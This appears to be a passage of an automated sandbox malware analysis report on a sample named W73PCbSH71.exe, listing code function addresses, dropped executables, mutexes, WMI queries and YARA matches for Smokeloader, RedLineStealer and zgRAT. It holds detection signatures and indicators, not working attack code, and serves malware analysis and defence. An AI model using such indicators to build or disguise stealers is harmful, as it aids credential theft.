Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00443190	21_2_00443190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00430221	21_2_00430221
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041C5A0	21_2_0041C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004316B0	21_2_004316B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004017A0	21_2_004017A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041D800	21_2_0041D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B8C0	21_2_0043B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004289E0	21_2_004289E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00430BE2	21_2_00430BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041BBA0	21_2_0041BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00443BB0	21_2_00443BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041CD40	21_2_0041CD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041DE00	21_2_0041DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040D070	21_2_0040D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00432000	21_2_00432000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042E029	21_2_0042E029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041F17B	21_2_0041F17B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004291A4	21_2_004291A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00428270	21_2_00428270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004172E0	21_2_004172E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004342F0	21_2_004342F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042A306	21_2_0042A306
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00416320	21_2_00416320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00410330	21_2_00410330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004243D2	21_2_004243D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004253A2	21_2_004253A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040F470	21_2_0040F470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D4A0	21_2_0042D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004243D2	21_2_004243D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D52A	21_2_0042D52A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D5CF	21_2_0042D5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004395E0	21_2_004395E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D580	21_2_0042D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042F580	21_2_0042F580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D61F	21_2_0042D61F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004186C0	21_2_004186C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D6E6	21_2_0042D6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042E75C	21_2_0042E75C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D73F	21_2_0042D73F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D7DB	21_2_0042D7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040E790	21_2_0040E790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041E7B0	21_2_0041E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D7B4	21_2_0042D7B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042D8A4	21_2_0042D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041B910	21_2_0041B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042E932	21_2_0042E932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040F9A0	21_2_0040F9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004199B0	21_2_004199B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00429A50	21_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042DA79	21_2_0042DA79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00426AD2	21_2_00426AD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00437AF0	21_2_00437AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00441A86	21_2_00441A86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042BB72	21_2_0042BB72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040DBC0	21_2_0040DBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041EBA0	21_2_0041EBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042DCC0	21_2_0042DCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040FE50	21_2_0040FE50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00436E30	21_2_00436E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042FE82	21_2_0042FE82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00402F70	21_2_00402F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00403F00	21_2_00403F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00417FC0	21_2_00417FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042EF90	21_2_0042EF90
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_00406953	22_2_00406953
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004301D0	24_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004442C4	24_2_004442C4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0048C28C	24_2_0048C28C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0045E8DC	24_2_0045E8DC
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0045A984	24_2_0045A984
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004449BC	24_2_004449BC
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00434B1C	24_2_00434B1C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00466BAC	24_2_00466BAC
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00468C34	24_2_00468C34
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00430D5C	24_2_00430D5C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00444DC8	24_2_00444DC8
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00485050	24_2_00485050
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0045101C	24_2_0045101C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0047F134	24_2_0047F134
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0043D5A4	24_2_0043D5A4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0046F7D8	24_2_0046F7D8
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00443D1C	24_2_00443D1C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00433E18	24_2_00433E18
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00485F84	24_2_00485F84

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00456FF8 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00457204 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: String function: 00403684 appears 218 times
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: String function: 00403888 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: String function: 00409CDB appears 39 times
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: String function: 6F8D90D8 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: String function: 6F8DD520 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: String function: 6F8D9B35 appears 141 times
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: String function: 00402DAB appears 51 times

Source: W73PCbSH71.exe

Static PE information: No import functions for PE file found

Source: C:\Windows\explorer.exe

Section loaded: taskschd.dll

Jump to behavior

Source: W73PCbSH71.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 36.2.7D14.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.0.907.exe.c30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: W73PCbSH71.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 3FF8.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5A58.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 617D.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: W73PCbSH71.exe

Static PE information: Section .text

Source: 7D14.exe.1.dr

Static PE information: Section: ZLIB complexity 0.9906572164948454

Source: 617D.exe.1.dr, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 617D.exe.1.dr, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.expl.evad.winEXE@81/432@16/19

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	10_2_00403532
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	13_2_00403532
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	19_2_00409448
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	22_2_00403382
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	24_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

10_2_004049C7

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_0058D43E CreateToolhelp32Snapshot,Module32First,

14_2_0058D43E

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_004021AF CoCreateInstance,

10_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Code function: 19_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,

19_2_00409BEC

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Program Files (x86)\360

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jfhrjta

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9234.exe	Mutant created: \Sessions\1\BaseNamedObjects\b6bf0d21327ed995
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\907.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Mutant created: \Sessions\1\BaseNamedObjects\Costura1485B29524EF63EB83DF771D39CCA767
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\dialer.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\907.tmp

Jump to behavior

Source: Yara match	File source: 16.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.2046828797.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY

Source: W73PCbSH71.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\907.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\W73PCbSH71.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp

